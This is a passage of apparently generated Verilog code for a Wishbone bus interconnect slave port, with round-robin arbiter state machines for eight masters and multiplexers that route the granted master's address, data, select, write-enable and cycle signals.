                                s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[0] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[1] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[2] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant4:
        begin
            if (  !( s0_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[5] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[6] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[7] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[0] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[1] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[2] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[3] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant5:
        begin
            if (  !( s0_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[6] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[7] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[0] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[1] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[2] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[3] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[4] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant6:
        begin
            if (  !( s0_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[7] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[0] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[1] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[2] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[3] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[4] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[5] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb2_grant7:
        begin
            if (  !( s0_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s0_msel_arb2_req[0] ) 
                begin
                    s0_msel_arb2_next_state = s0_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s0_msel_arb2_req[1] ) 
                    begin
                        s0_msel_arb2_next_state = s0_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s0_msel_arb2_req[2] ) 
                        begin
                            s0_msel_arb2_next_state = s0_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s0_msel_arb2_req[3] ) 
                            begin
                                s0_msel_arb2_next_state = s0_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s0_msel_arb2_req[4] ) 
                                begin
                                    s0_msel_arb2_next_state = s0_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb2_req[5] ) 
                                    begin
                                        s0_msel_arb2_next_state = s0_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb2_req[6] ) 
                                        begin
                                            s0_msel_arb2_next_state = s0_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s0_msel_arb3_req = { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd3 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd3 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd3 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd3 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd3 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd3 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd3 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s0_msel_arb3_state <= s0_msel_arb3_grant0;
        end
        else
        begin 
            s0_msel_arb3_state <= s0_msel_arb3_next_state;
        end
    end
    always @ (  s0_msel_arb3_state or  { ( s0_msel_req[7] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[15] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[14] ) ) } == 2'd3 ) ), ( s0_msel_req[6] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[13] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[12] ) ) } == 2'd3 ) ), ( s0_msel_req[5] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[11] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[10] ) ) } == 2'd3 ) ), ( s0_msel_req[4] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[9] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[8] ) ) } == 2'd3 ) ), ( s0_msel_req[3] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[7] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[6] ) ) } == 2'd3 ) ), ( s0_msel_req[2] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[5] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[4] ) ) } == 2'd3 ) ), ( s0_msel_req[1] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[3] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[2] ) ) } == 2'd3 ) ), ( s0_msel_req[0] & ( { ( ( ( s0_msel_pri_sel == 2'd2 ) ) ? ( rf_conf0[1] ) : ( 1'b0 ) ), ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf0[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s0_msel_arb3_next_state = s0_msel_arb3_state;
        case ( s0_msel_arb3_state ) 
        s0_msel_arb3_grant0:
        begin
            if (  !( s0_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[1] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[2] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[3] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[4] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[5] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[6] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[7] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant1:
        begin
            if (  !( s0_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[2] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[3] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[4] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[5] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[6] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[7] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[0] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant2:
        begin
            if (  !( s0_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[3] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[4] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[5] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[6] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[7] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[0] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[1] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant3:
        begin
            if (  !( s0_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[4] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[5] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[6] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[7] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[0] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[1] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[2] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant4:
        begin
            if (  !( s0_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[5] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[6] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[7] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[0] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[1] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[2] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[3] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant5:
        begin
            if (  !( s0_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[6] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[7] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[0] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[1] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[2] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[3] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[4] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant6:
        begin
            if (  !( s0_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[7] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[0] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[1] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[2] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[3] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[4] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[5] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s0_msel_arb3_grant7:
        begin
            if (  !( s0_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s0_msel_arb3_req[0] ) 
                begin
                    s0_msel_arb3_next_state = s0_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s0_msel_arb3_req[1] ) 
                    begin
                        s0_msel_arb3_next_state = s0_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s0_msel_arb3_req[2] ) 
                        begin
                            s0_msel_arb3_next_state = s0_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s0_msel_arb3_req[3] ) 
                            begin
                                s0_msel_arb3_next_state = s0_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s0_msel_arb3_req[4] ) 
                                begin
                                    s0_msel_arb3_next_state = s0_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s0_msel_arb3_req[5] ) 
                                    begin
                                        s0_msel_arb3_next_state = s0_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s0_msel_arb3_req[6] ) 
                                        begin
                                            s0_msel_arb3_next_state = s0_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s0_msel_pri_out or  s0_msel_arb0_state or  s0_msel_arb1_state)
    begin
        if ( s0_msel_pri_out[0] ) 
        begin
            s0_msel_sel1 = s0_msel_arb1_state;
        end
        else
        begin 
            s0_msel_sel1 = s0_msel_arb0_state;
        end
    end
    always @ (  s0_msel_pri_out or  s0_msel_arb0_state or  s0_msel_arb1_state or  s0_msel_arb2_state or  s0_msel_arb3_state)
    begin
        case ( s0_msel_pri_out ) 
        2'd0:
        begin
            s0_msel_sel2 = s0_msel_arb0_state;
        end
        2'd1:
        begin
            s0_msel_sel2 = s0_msel_arb1_state;
        end
        2'd2:
        begin
            s0_msel_sel2 = s0_msel_arb2_state;
        end
        2'd3:
        begin
            s0_msel_sel2 = s0_msel_arb3_state;
        end
        endcase
    end
    assign s0_mast_sel = ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s0_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s0_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s0_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s0_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s0_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s0_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s0_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s0_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s0_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s0_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s0_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s0_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s0_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s0_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s0_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s0_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s0_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s0_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s0_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s0_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s0_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s0_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s0_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s0_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s0_m0_data_o = s0_data_i;
    assign s0_m1_data_o = s0_data_i;
    assign s0_m2_data_o = s0_data_i;
    assign s0_m3_data_o = s0_data_i;
    assign s0_m4_data_o = s0_data_i;
    assign s0_m5_data_o = s0_data_i;
    assign s0_m6_data_o = s0_data_i;
    assign s0_m7_data_o = s0_data_i;
    always @ (  ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s0_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s0_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s0_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s0_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s0_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s0_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s0_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s0_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s0_m0_cyc_r <= m0_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m1_cyc_r <= m1_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m2_cyc_r <= m2_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m3_cyc_r <= m3_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m4_cyc_r <= m4_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m5_cyc_r <= m5_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m6_cyc_r <= m6_s0_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s0_m7_cyc_r <= m7_s0_cyc_o;
    end
    always @ (  ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) or  m0_s0_cyc_o or  m1_s0_cyc_o or  m2_s0_cyc_o or  m3_s0_cyc_o or  m4_s0_cyc_o or  m5_s0_cyc_o or  m6_s0_cyc_o or  m7_s0_cyc_o or  s0_m0_cyc_r or  s0_m1_cyc_r or  s0_m2_cyc_r or  s0_m3_cyc_r or  s0_m4_cyc_r or  s0_m5_cyc_r or  s0_m6_cyc_r or  s0_m7_cyc_r)
    begin
        case ( ( ( ( s0_pri_sel == 2'd0 ) ) ? ( s0_arb_state ) : ( ( ( ( s0_msel_pri_sel == 2'd0 ) ) ? ( s0_msel_arb0_state ) : ( ( ( ( s0_msel_pri_sel == 2'd1 ) ) ? ( s0_msel_sel1 ) : ( s0_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s0_wb_cyc_o = ( m0_s0_cyc_o & s0_m0_cyc_r );
        end
        3'd1:
        begin
            s0_wb_cyc_o = ( m1_s0_cyc_o & s0_m1_cyc_r );
        end
        3'd2:
        begin
            s0_wb_cyc_o = ( m2_s0_cyc_o & s0_m2_cyc_r );
        end
        3'd3:
        begin
            s0_wb_cyc_o = ( m3_s0_cyc_o & s0_m3_cyc_r );
        end
        3'd4:
        begin
            s0_wb_cyc_o = ( m4_s0_cyc_o & s0_m4_cyc_r );
        end
        3'd5:
        begin
            s0_wb_cyc_o = ( m5_s0_cyc_o & s0_m5_cyc_r );
        end
        3'd6:
        begin
            s0_wb_cyc_o = ( m6_s0_cyc_o & s0_m6_cyc_r );
        end
        3'd7:
        begin
            s0_wb_cyc_o = ( m7_s0_cyc_o & s0_m7_cyc_r );
        end
        endcase
    end
